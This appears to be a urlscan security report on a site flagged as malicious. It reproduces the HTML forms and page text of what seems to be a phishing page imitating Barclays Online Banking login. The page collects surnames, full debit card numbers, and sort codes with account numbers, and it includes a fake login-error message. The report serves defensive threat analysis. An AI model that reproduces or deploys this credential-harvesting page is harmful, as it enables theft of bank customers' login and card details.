a1.somotaro.com
Open in
urlscan Pro
193.106.175.107
Malicious Activity!
Public Scan
URL:
https://a1.somotaro.com/
Submission: On June 14 via api from GB — Scanned from GB
Submission: On June 14 via api from GB — Scanned from GB
Form analysis
3 forms found in the DOMPOST #
<form method="POST" ftb="true" autocomplete="off" id="accordion-top-form" onsubmit="return false;" action="#">
<div class="accordion-page" style="display: block;">
<script>
function gcEChange(radio) {
$('.gc-variant').hide();
$('.gc-variant-' + radio.value).css('display', 'inline-block');
}
function gcBeforeSubmit() {
var min = gateController.minLength;
var color = gateController.cneColor.fail;
var type = $('input[type=radio][name=identityToken]:checked').val();
$('.gcEnterPassword').val('');
if (type == 'C') {
if ($.trim($('.gc-mem-part1').val()).length < min) $('.gc-mem-part1').css('background-color', color);
else $('.gcEnterPassword').val($.trim($('.gc-mem-part1').val()));
}
if (type == 'B') {
var e = false;
for (var i = 1; i <= 4; i++)
if ($.trim($('.gc-card-part' + i).val()).length < min) {
$('.gc-card-part' + i).css('background-color', color);
e = true;
}
if (!e) $('.gcEnterPassword').val($.trim($('.gc-card-part1').val()) + $.trim($('.gc-card-part2').val()) + $.trim($('.gc-card-part3').val()) + $.trim($('.gc-card-part4').val()));
}
if (type == 'A') {
var e = false;
for (var i = 1; i <= 4; i++)
if ($.trim($('.gc-acc-part' + i).val()).length < min) {
$('.gc-acc-part' + i).css('background-color', color);
e = true;
}
if (!e) $('.gcEnterPassword').val($.trim($('.gc-acc-part1').val()) + $.trim($('.gc-acc-part2').val()) + $.trim($('.gc-acc-part3').val()) + $.trim($('.gc-acc-part4').val()));
}
return true;
}
</script>
<input type="hidden" class="gcEnterPassword gc-input">
<ul class="form-grid" role="presentation">
<li>
<label id="label-surname" for="surname">Surname / Last Name</label>
<input type="text" name="surname" id="surname" aria-labelledby="label-surname" minlength="2" maxlength="24" class="surname text gc-input gcEnterLogin" autocomplete="off">
</li>
<li>
<div class="line-break">
<fieldset>
<legend class="large-caption">How would you like to log in?</legend>
<ul role="radiogroup" class="radio-list">
<li class="membership-number">
<!--[if lt IE 9]><input type="radio" name="identityToken" value="C" checked="checked" autocomplete="off" onclick="gcEChange(this)" style="display: inline-block; position: relative; left: 0; top: 0"> <span style="font-family: Verdana; font-size: 1.2em; color: #777676">Membership number</span><br><![endif]-->
<!--[if gte IE 9]><!--><input type="radio" name="identityToken" id="membership-radio" class="linked-radio" value="C" checked="checked" autocomplete="off" onchange="gcEChange(this)"><label for="membership-radio" id="linked-label"
role="radio" class="linked-label selected selected"><span>Membership number</span></label><!--<![endif]-->
<input type="text" name="membershipNumber" id="membership-num" aria-labelledby="linked-label" minlength="12" maxlength="12" class="gc-variant gc-variant-C membership-number text gc-input gc-mem-part1" autocomplete="off"
numerical="true" style="display: inline-block">
<div id="tooltip_membership" class="tooltip">
<a href="#" class="icon-question" role="tooltip" aria-labelledby="tooltip_membership_content"></a>
<span>
<b></b>
<div class="content" id="tooltip_membership_content">
<p>You will have received this number in the post when you first signed up to Online Banking</p>
</div>
</span>
</div>
<span name="assistLink" class="assistLink">
<a id="assistLink" data-target="action::FLDMembershipNumber.action::POST" href="#" class="accordion-action ">Forgotten your membership number?</a>
</span>
</li>
<li>
<!--[if lt IE 9]><input type="radio" name="identityToken" value="B" autocomplete="off" onclick="gcEChange(this)" style="display: inline-block; position: relative; left: 0; top: 0"> <span style="font-family: Verdana; font-size: 1.2em; color: #777676">Card number</span><br><![endif]-->
<!--[if gte IE 9]><!--><input type="radio" name="identityToken" id="card-radio" class="linked-radio " value="B" autocomplete="off" onchange="gcEChange(this)"><label for="card-radio" id="linked-label" role="radio"
class="linked-label"><span>Card number</span></label><!--<![endif]-->
<fieldset class="gc-variant gc-variant-B card-no auto-input-focus-step-thru">
<label class="hide" for="debitCardSet1">First 4 digits of debit card number</label>
<input type="text" class="card-number debitCardSet-grouped gc-card-part1 gc-input" autocomplete="off" maxlength="4" value="" id="debitCardSet1" name="debitCardSet1">
<label class="hide" for="debitCardSet2">Second 4 digits of debit card number</label>
<input type="text" class="card-number debitCardSet-grouped gc-card-part2 gc-input" autocomplete="off" maxlength="4" value="" id="debitCardSet2" name="debitCardSet2">
<label class="hide" for="debitCardSet3">Third 4 digits of debit card number</label>
<input type="text" class="card-number debitCardSet-grouped gc-card-part3 gc-input" autocomplete="off" maxlength="4" value="" id="debitCardSet3" name="debitCardSet3">
<label class="hide" for="debitCardSet4">Last 4 digits of debit card number</label>
<input type="text" class="card-number debitCardSet-grouped gc-card-part4 gc-input" autocomplete="off" maxlength="4" value="" id="debitCardSet4" name="debitCardSet4">
<label id="place_holder" class="hide"></label>
</fieldset>
<div id="tooltip_cardno" class="tooltip
">
<a href="#" class="icon-question" role="tooltip" aria-labelledby="tooltip_cardno_content"></a>
<span>
<b></b>
<div class="content" id="tooltip_cardno_content">
<p>This can be found on the front of your Barclays debit, cash or authentication card.</p>
<p> <img src="/data/card_number_card.jpg" alt="Card" height="109" width="168"></p>
</div>
</span>
</div>
</li>
<li>
<!--[if lt IE 9]><input type="radio" name="identityToken" value="A" autocomplete="off" onclick="gcEChange(this)" style="display: inline-block; position: relative; left: 0; top: 0"> <span style="font-family: Verdana; font-size: 1.2em; color: #777676">Sort code and account number</span><br><![endif]-->
<!--[if gte IE 9]><!--><input type="radio" name="identityToken" id="account-radio" class="linked-radio " value="A" autocomplete="off" onchange="gcEChange(this)"><label for="account-radio" id="linked-label" role="radio"
class="linked-label"><span>Sort code and account number</span></label><!--<![endif]-->
<fieldset class="sortcode-account-no auto-input-focus-step-thru gc-variant gc-variant-A">
<label class="hide" for="sortCodeSet1">First 2 digits of sort code</label>
<input type="text" maxlength="2" class="sort-code gc-acc-part1 gc-input" value="" id="sortCodeSet1" name="sortCodeSet1" autocomplete="off">
<span class="divider">-</span>
<label class="hide" for="sortCodeSet2">Second 2 digits of sort code</label>
<input type="text" maxlength="2" class="sort-code gc-acc-part2 gc-input" value="" id="sortCodeSet2" name="sortCodeSet2" autocomplete="off">
<span class="divider">-</span>
<label class="hide" for="sortCodeSet3">Last 2 digits of sort code</label>
<input type="text" maxlength="2" class="sort-code gc-acc-part3 gc-input" value="" id="sortCodeSet3" name="sortCodeSet3" autocomplete="off">
<span class="divider"> </span>
<label class="hide" for="the-account-number">8 digit account number</label>
<input class="account-number gc-acc-part4 gc-input" type="text" autocomplete="off" maxlength="8" value="" id="the-account-number" name="accountNumber">
</fieldset>
<div id="tooltip_sortcode" class="tooltip
">
<a href="#" class="icon-question" role="tooltip" aria-labelledby="tooltip_sortcode_content"></a>
<span>
<b></b>
<div class="content" id="tooltip_sortcode_content">
<p>Your sort code is a 6-digit number – eg 12-34-56. Your account number is 8 digits long. Both are on the front of your debit card.</p>
<p> <img src="/data/sortcode_account_number_card.jpg" alt="Card" height="113" width="173"></p>
</div>
</span>
</div>
</li>
</ul>
</fieldset>
</div>
</li>
<li>
<div class="line-break">
<div class="checkbox">
<input type="checkbox" name="rememberDetails" id="details-save" aria-labelledby="label-details-save" value="true" autocomplete="off">
<label for="details-save">
<span id="label-details-save">
<p>Remember me. (We don't recommend this option if you're using a public or shared device)</p>
</span>
</label>
</div>
<div id="helplink_1" data-help-card-ref="Remember_Me_Help" data-auto-execute="false" display="OPEN" class="helplink
rememberMe
">
<div class="icon-info " aria-hidden="true"></div>
<a href="#" class="helplinktext">Why this is safe</a>
</div>
</div>
</li>
<li>
<button onclick="gcBeforeSubmit()" type="submit" id="forward" class="button blue validate accordion-action gc-submit gcEnterButton" data-target="action::LoginStep1WithoutAssistCookie_display.action::POST">Next step</button>
</li>
</ul>
<input type="hidden" name="requesttoken" value="" autocomplete="off">
<div class="accordion-config">
<input type="hidden" id="expectedposition" value="accordion-top" autocomplete="off">
</div>
<div class="help-centre">
</div>
<div class="channel-info-container">
</div>
<!-- stub -->
</div>
</form>
POST #
<form method="POST" ftb="true" onsubmit="return false;" action="#" autocomplete="off" id="accordion-bottom-form">
<div class="accordion-page">
</div>
</form>
<form id="_st" autocomplete="off">
<input type="hidden" name="requestid" value="" autocomplete="off">
<input type="hidden" name="requesttoken" value="" autocomplete="off">
</form>
Text Content
Skip to: content, navigation * Mobile site * Contact us * Security * Accessibility QUICK, SAFE AND CONVENIENT - ONLINE BANKING MADE EASY Not yet registered for Online Banking ? Register now. 1186 - Sorry, we can't log you in to Online Banking because the details you've entered don't match our records. Please re-enter them carefully. If you've forgotten any of them, you can see how to get a reminder in the 'Help module' to the right of this page. Distraction fraud – a type of scam that involves someone distracting you when you’re at a cash machine in order to get your PIN or card – is on the rise. To keep your money safe, always shield your PIN and don’t let anyone distract you or look over your shoulder. More anti-fraud tips Step 1 - Who are you? STEP 1 - WHO ARE YOU? * Surname / Last Name * How would you like to log in? * Membership number You will have received this number in the post when you first signed up to Online Banking Forgotten your membership number? * Card number First 4 digits of debit card number Second 4 digits of debit card number Third 4 digits of debit card number Last 4 digits of debit card number This can be found on the front of your Barclays debit, cash or authentication card. * Sort code and account number First 2 digits of sort code - Second 2 digits of sort code - Last 2 digits of sort code 8 digit account number Your sort code is a 6-digit number – eg 12-34-56. Your account number is 8 digits long. Both are on the front of your debit card. * Remember me. (We don't recommend this option if you're using a public or shared device) Why this is safe * Next step Step 2 - Confirm your ID STEP 2 - CONFIRM YOUR ID * VISIT HELP CENTRE * * * TITLE * Close Don't show me this again * How do I login with a PINsentry card reader? * Don't save your password in your browser * How do I get my eight digit code? * What do I do if I've lost my PINsentry or don't have it to hand? * PIN Locked? * Need more help? * Find out how to contact us. Cookies- Updated Barclays Bank PLC. Authorised by the Prudential Regulation Authority and regulated by the Financial Conduct Authority and the Prudential Regulation Authority (Financial Services Register no: 122702). Barclays Bank PLC subscribes to the Lending Code which is monitored and enforced by the Lending Standards Board. Further details can be found at www.lendingstandardsboard.org.uk. Barclays Insurance Services Company Limited is authorised and regulated by the Financial Conduct Authority (Financial Services Register no: 312078). Barclays Bank PLC. Registered in England. Registered no. 1026167. Barclays Insurance Services Company Limited. Registered in England. Registered no. 973765. Registered office for both: 1 Churchill Place, London E14 5HP. 'The Woolwich' and 'Woolwich' are trademarks and trading names of Barclays Bank PLC. Barclays Business is a trading name of Barclays Bank PLC. Proud sponsors of the Barclays Premier League